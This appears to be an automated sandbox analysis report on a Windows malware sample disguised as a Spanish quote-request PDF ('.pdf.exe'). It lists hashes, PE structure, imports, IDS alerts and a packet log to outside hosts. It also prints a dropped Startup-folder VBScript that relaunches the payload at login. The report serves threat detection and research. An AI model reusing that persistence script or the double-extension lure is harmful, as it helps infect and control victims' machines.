File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1131008
Entropy (8bit):	6.989545828613828
Encrypted:	false
SSDEEP:	24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8aHAyDtV4bSk7NbPA:ATvC/MTQYxsWR7aHphASkh
MD5:	7D291DA9B6E5251A9A22673230884B5F
SHA1:	95B9391BC0315EDBD30CEABE0C272256D83BDD8C
SHA-256:	7D7A7EFA7DAF9BB3031E0210F6E66CF756F1EFDF8B9A95DE6EA510A0FD3DF5D8
SHA-512:	D63B8E64A00CF247F0C2EEED224AE11B7F560CBCDEEBB9AA67BD729E72947BB363DB43C5FDA2B4A3B11B20E04F1F196203B81193B04F394A9A8C179CE08E5CF9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....ag..........".................w.............@.......................................@...@.......@.....................d...\|....@....................... ...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u... ...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Download File

Process:	C:\Users\user\AppData\Local\silvexes\palladiums.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	3.418457352621988
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1WlMg6znkSMBnriIM8lfQVn:DsO+vNlzQ1vgUnpMRmA2n
MD5:	3A4A6AE4024C0C6394C84FF26FEA53F3
SHA1:	57A83F27C2045E343704FBEFFDCE26BF25ACDC70
SHA-256:	BB57F25FB8A217C70B1D4EEB6ECC24444B86DB9F332AC9AFAD6EF538B7B306BB
SHA-512:	D0F00D2D831ACDA16C6DB484AD7BB09E2BBCC7518005747B174436EA8C41BA5DCEB107382237F610BE0ACA019542D0072C13D8EE7D65C4A75060F71BCD10FE01
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.i.l.v.e.x.e.s.\.p.a.l.l.a.d.i.u.m.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.989545828613828
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe
File size:	1'131'008 bytes
MD5:	7d291da9b6e5251a9a22673230884b5f
SHA1:	95b9391bc0315edbd30ceabe0c272256d83bdd8c
SHA256:	7d7a7efa7daf9bb3031e0210f6e66cf756f1efdf8b9a95de6ea510a0fd3df5d8
SHA512:	d63b8e64a00cf247f0c2eeed224ae11b7f560cbcdeebb9aa67bd729e72947bb363db43c5fda2b4a3b11b20e04f1f196203b81193b04f394a9a8c179ce08e5cf9
SSDEEP:	24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8aHAyDtV4bSk7NbPA:ATvC/MTQYxsWR7aHphASkh
TLSH:	B435BF0273D1C062FF9B92334B5AF6515BBC69260123E62F13981DB9BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6761A4BF [Tue Dec 17 16:20:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FC594B27B53h
jmp 00007FC594B2745Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC594B2763Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC594B2760Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FC594B2A1FDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FC594B2A248h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FC594B2A231h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3d690	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x112000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3d690	0x3d800	e6444df0b9ec74d024c5739a465053f7	False	0.8954522357723578	data	7.819776538052462	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x112000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0x34d27	data			1.0003512680313738
RT_GROUP_ICON	0x111138	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1111b0	0x14	data	English	Great Britain	1.15
RT_VERSION	0x1111c4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1112a0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T13:44:47.019850+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	132.226.247.73	80	TCP
2024-12-18T13:44:49.426083+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	132.226.247.73	80	TCP
2024-12-18T13:44:51.040239+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	104.21.67.152	443	TCP
2024-12-18T13:44:52.535462+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49708	132.226.247.73	80	TCP
2024-12-18T13:44:57.354578+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49722	104.21.67.152	443	TCP
2024-12-18T13:45:14.457932+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-18T13:45:17.207330+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-18T13:45:19.347916+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-18T13:45:20.956418+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49783	104.21.67.152	443	TCP
2024-12-18T13:45:22.441745+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49790	132.226.247.73	80	TCP
2024-12-18T13:45:26.535476+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49800	132.226.247.73	80	TCP
2024-12-18T13:45:29.629183+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49812	132.226.247.73	80	TCP
2024-12-18T13:45:42.962338+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49851	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 13:44:45.093614101 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:45.213454008 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:45.213552952 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:45.213882923 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:45.333447933 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:46.526554108 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:46.535198927 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:46.656028032 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:46.971438885 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:47.019850016 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:47.179646015 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:47.179682016 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:47.179760933 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:47.187711954 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:47.187730074 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.408796072 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.408865929 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:48.547874928 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:48.547909975 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.548425913 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.597982883 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:48.612267971 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:48.659353971 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.938822985 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.938905954 CET	443	49705	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:48.938961029 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:48.946408033 CET	49705	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:48.949779034 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:49.069529057 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:49.375914097 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:49.379945040 CET	49706	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:49.379987955 CET	443	49706	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:49.380079985 CET	49706	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:49.380692959 CET	49706	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:49.380707026 CET	443	49706	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:49.426083088 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:50.593316078 CET	443	49706	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:50.596323967 CET	49706	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:50.596348047 CET	443	49706	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:51.040257931 CET	443	49706	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:51.040484905 CET	443	49706	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:51.040673018 CET	49706	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:51.040956020 CET	49706	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:51.044114113 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:51.045387983 CET	49708	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:51.163999081 CET	80	49704	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:51.164062023 CET	49704	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:51.165476084 CET	80	49708	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:51.165546894 CET	49708	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:51.165811062 CET	49708	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:51.296566010 CET	80	49708	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:52.481070042 CET	80	49708	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:52.482536077 CET	49709	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:52.482585907 CET	443	49709	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:52.482691050 CET	49709	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:52.482933044 CET	49709	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:52.482947111 CET	443	49709	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:52.535461903 CET	49708	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:53.696198940 CET	443	49709	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:53.698087931 CET	49709	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:53.698122978 CET	443	49709	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:54.142349005 CET	443	49709	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:54.142426968 CET	443	49709	104.21.67.152	192.168.2.5
Dec 18, 2024 13:44:54.142539978 CET	49709	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:54.143584013 CET	49709	443	192.168.2.5	104.21.67.152
Dec 18, 2024 13:44:54.199393988 CET	49715	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:54.321263075 CET	80	49715	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:54.321363926 CET	49715	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:54.323556900 CET	49715	80	192.168.2.5	132.226.247.73
Dec 18, 2024 13:44:54.448101044 CET	80	49715	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:55.676704884 CET	80	49715	132.226.247.73	192.168.2.5
Dec 18, 2024 13:44:55.680418015 CET	49722	443	192.168.2.5	104.21.67.152
